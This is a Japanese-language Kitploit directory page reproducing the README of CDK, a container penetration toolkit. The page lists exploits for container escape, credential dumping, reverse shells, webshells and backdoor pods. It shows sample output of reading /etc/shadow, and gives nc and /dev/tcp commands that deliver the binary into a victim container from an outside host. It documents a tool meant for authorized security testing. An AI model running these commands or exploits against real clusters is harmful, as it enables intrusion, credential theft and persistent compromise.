Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CDK — 📦 K8s、Docker、Containerdのセキュリティテストを簡単にします。 | Kitploit
ツール/GitHubGitHub/cdk-team/cdk
特権昇格偵察コンテナセキュリティ永続化メカニズムエクスプロイト横移動ポストエクスプロイトペネトレーションテストクラウドセキュリティコンテナエスケープ
GitHubcdk-team/cdk

CDK

4.7k6063ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

📦 K8s、Docker、Containerdのセキュリティテストを簡単にします。

リポジトリを見るウェブサイト

CDK - ゼロ依存コンテナペネトレーションツールキット

英語 | 简体中文

png

法的免責事項

事前の相互同意なしにCDKを使用してターゲットを攻撃することは違法です。CDKはセキュリティテスト目的のみに使用されます。

概要

CDKは、オープンソースのコンテナペネトレーションツールキットであり、OSに依存せずに様々なスリム化されたコンテナで安定したエクスプロイトを提供するように設計されています。便利なネットツールと多くの強力なPoC/EXPが付属しており、コンテナからの脱出やK8sクラスターの乗っ取りを容易にします。

クイックスタート

cdk eva を実行して評価情報と推奨エクスプロイトを取得し、次に cdk run を実行して攻撃を開始します。

root@kitploit:~
> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

インストール/配信

最新リリースを https://github.com/cdk-team/CDK/releases/ からダウンロードします。

実行可能ファイルをターゲットコンテナにドロップしてテストを開始します。

ヒント:実際のペネトレーションテストでCDKをターゲットコンテナに配信する

ファイルをアップロードできるエクスプロイトがある場合、CDKバイナリを直接アップロードできます。

RCEエクスプロイトがあるが、ターゲットコンテナに curl や wget がない場合、以下の方法でCDKを配信できます:

  1. まず、パブリックIPを持つホストにCDKバイナリをホストします。
root@kitploit:~
(ホスト側)
nc -lvp 999 < cdk
  1. 被害コンテナ内で以下を実行します。
root@kitploit:~
cat < /dev/tcp/(あなたのパブリックホストIP)/(ポート) > cdk
chmod a+x cdk

使用方法

root@kitploit:~
Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              コンテナ内部の情報を収集して脆弱性を発見します。
  cdk evaluate --full                       情報収集時にファイルスキャンを有効にします。

Exploit:
  cdk run --list                            利用可能なエクスプロイトをすべて表示します。
  cdk run <exploit> [<args>...]             単一のエクスプロイトを実行します。詳細は https://github.com/cdk-team/CDK/wiki を参照。

Tool:
  vi <file>                                 "vi" コマンドのようにコンテナ内のファイルを編集します。
  ps                                        "ps -ef" コマンドのようにプロセス情報を表示します。
  nc [options]                              TCP トンネルを作成します。
  ifconfig                                  ネットワーク情報を表示します。
  kcurl <path> (get|post) <uri> <data>      K8s api-server にリクエストを送信します。
  ectl <endpoint> get <key>                 ectd キーの不正列挙を行います。
  ucurl (get|post) <socket> <uri> <data>    Docker Unix ソケットにリクエストを送信します。
  probe <ip> <port> <parallel> <timeout-ms> TCP ポートスキャン、例: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     このヘルプメッセージを表示します。
  -v --version  バージョンを表示します。
  --profile=<name> 評価プロファイルを選択します。

機能

CDKには3つのモジュールがあります:

  1. Evaluate: コンテナ内部の情報を収集して潜在的な脆弱性を発見します。
  2. Exploit: コンテナ脱出、永続化、水平移動のための機能を提供します。
  3. Tool: TCP/HTTPリクエスト、トンネル、K8sクラスター管理のためのネットワークツールとAPIを提供します。

Evaluate モジュール

使い方

root@kitploit:~
cdk evaluate [--full]

Exploit モジュール

利用可能なエクスプロイトをすべて表示:

root@kitploit:~
cdk run --list

ターゲットを指定してエクスプロイトを実行:

root@kitploit:~
cdk run <script-name> [options]

シン版に関する注記: シンリリースは、サーバーレス関数のような短命なコンテナシェル向けに準備されています。ソースコードにビルドタグを追加し、いくつかのエクスプロイトを削除してバイナリを軽量化しています。2MBのファイルにはCDK機能の90%が含まれており、CDKソースコードから有用なエクスプロイトを選んで独自の軽量バイナリをビルドすることもできます。

Tool モジュール

Linuxのようにコマンドを実行しますが、入力引数が少し異なります。使用法リンクを参照してください。

root@kitploit:~
cdk nc [options]
cdk ps

リリースドキュメント

新しいバージョンのリリース方法、シン版の作成方法、UPXバージョンを提供する理由、all/normal/thin/upxの各バージョンの違い、および特定のCDKエクスプロイトとツールを選択して独自のリリースをコンパイルする方法については、リリースドキュメントを確認してください。

開発者向けドキュメント

  • コンテナ内でのテストの実行

CDKへの貢献

まず、時間を割いて貢献していただきありがとうございます!

以下のコントリビューターに感謝します:

その他のコントリビューター:コントリビューター一覧

バグ報告

バグはGitHub Issuesで追跡されています。現在のCDKバージョン、エラーメッセージ、環境を含めてIssueを作成してください。問題を再現する正確な手順を説明してください。

機能強化の提案

機能強化の提案はGitHub Discussionsで追跡されています。ここにアイデアを投稿して、開発者と直接議論することができます。

プルリクエスト

問題の修正やCDKの品質維持:

  • 現在のCDKバージョン、環境、問題、および問題を再現する正確な手順を説明してください。
  • 問題修正前後の実行スクリーンショットまたはログを提供してください。

新機能またはエクスプロイト:

  • この機能強化が他のユーザーにとってどのように役立つかを説明してください。
  • レビューを続けられる持続可能な環境を提供してください。
  • この新機能の動作を示すスクリーンショットを提供してください。
  • 新しい評価/エクスプロイトスクリプトをコミットする場合は、PRメッセージに簡単なドキュメントを追加してください。こちらの例を参照してください。

イベント

404StarLink 2.0 - Galaxy

png

CDKプロジェクトは現在、404Team Starlink Project 2.0 に含まれています。StarLinkコミュニティに参加して、CDK開発チームと連絡を取りましょう。

  • https://github.com/knownsec/404StarLink2.0-Galaxy#community

BlackHat Asia 2021 Arsenal

  • https://www.blackhat.com/asia-21/arsenal/schedule/index.html#cdk-zero-dependency-container-penetration-toolkit-22422

HITB SecConf 2021 Amsterdam

  • ブリーフィング:「Attack Cloud Native Kubernetes」

WHC 2021 (补天白帽大会)

  • CDK: Also a Awesome BugBounty Tool for Cloud Platform

KCON 2021 Arsenal

  • http://kcon.knownsec.com/2021/#/arsenal

Kubernetes community Days 2021

  • https://community.cncf.io/events/details/cncf-kcd-china-presents-kubernetes-community-days-china/
ツールをダウンロード
戦術スクリプトサポート使用法/例
情報収集OS基本情報✔link
情報収集利用可能なCapabilities✔link
情報収集利用可能なLinuxコマンド✔link
情報収集マウント✔link
情報収集ネット名前空間✔link
情報収集機密ENV✔link
情報収集機密プロセス✔link
情報収集機密ローカルファイル✔link
情報収集Kube-proxy Route Localnet(CVE-2020-8558)✔link
情報収集DNSベースのサービスディスカバリ✔link
発見K8s Api-server情報✔link
発見K8s Service-account情報✔link
発見クラウドプロバイダーメタデータAPI✔link
戦術テクニックCDK Exploit名サポートシン版での対応ドキュメント
脱出docker-runc CVE-2019-5736runc-pwn✔✔
脱出containerd-shim CVE-2020-15257shim-pwn✔link
脱出docker.sock PoC (DIND攻撃)docker-sock-check✔✔link
脱出docker.sock RCEdocker-sock-pwn✔✔link
脱出Docker API(2375) RCEdocker-api-pwn✔✔link
脱出デバイスマウント脱出mount-disk✔✔link
脱出LXCFS脱出lxcfs-rw✔✔link
脱出Cgroups脱出mount-cgroup✔✔link
脱出特権のないユーザ名前空間の悪用脱出 CVE-2022-0492abuse-unpriv-userns✔✔link
脱出Procfs脱出mount-procfs✔✔link
脱出Ptrace脱出 PoCcheck-ptrace✔✔link
脱出Cgroupの書き換え(devices.allow)rewrite-cgroup-devices✔✔link
脱出ホストシステムからの任意ファイル読み取り(CAP_DAC_READ_SEARCH)cap-dac-read-search✔✔link
発見K8sコンポーネントプローブservice-probe✔✔link
発見Istio Sidecarメタダンプistio-check✔✔link
発見K8s Pod Security Policiesダンプk8s-psp-dump✔link
リモート制御リバースシェルreverse-shell✔✔link
リモート制御Kubelet Execkubelet-exec✔✔
資格情報アクセスレジストリブルートフォースregistry-brute✔✔link
資格情報アクセスアクセスキースキャンak-leakage✔✔link
資格情報アクセスEtcdからK8sトークンを取得etcd-get-k8s-token✔✔
資格情報アクセスK8s Secretsダンプk8s-secret-dump✔✔link
資格情報アクセスK8s Configダンプk8s-configmap-dump✔✔link
権限昇格K8s RBACバイパスk8s-get-sa-token✔✔link
権限昇格CVE-2026-31431 copy-fail (非root→root & x86_64のみ)copy-fail-cve-2026-31431✔link
永続化WebShellの展開webshell-deploy✔✔link
永続化バックドアPodの展開k8s-backdoor-daemonset✔✔link
永続化シャドウK8s api-serverの展開k8s-shadow-apiserver✔link
永続化K8s MITM攻撃 (CVE-2020-8554)k8s-mitm-clusterip✔✔link
永続化K8s CronJobの展開k8s-cronjob✔✔link
コマンド説明サポート使用法/例
ncTCPトンネル✔link
psプロセス情報✔link
netstat「netstat -antup」コマンドのようなもの✔
ifconfigネットワーク情報✔link
viファイルの編集✔link
ectlectdキーの不正列挙✔
kcurlK8s api-serverへのリクエスト✔link
dcurlDocker HTTP APIへのリクエスト✔link
ucurlDocker Unixソケットへのリクエスト✔link
rcurlDocker Registry APIへのリクエスト
probeIP/ポートスキャン✔link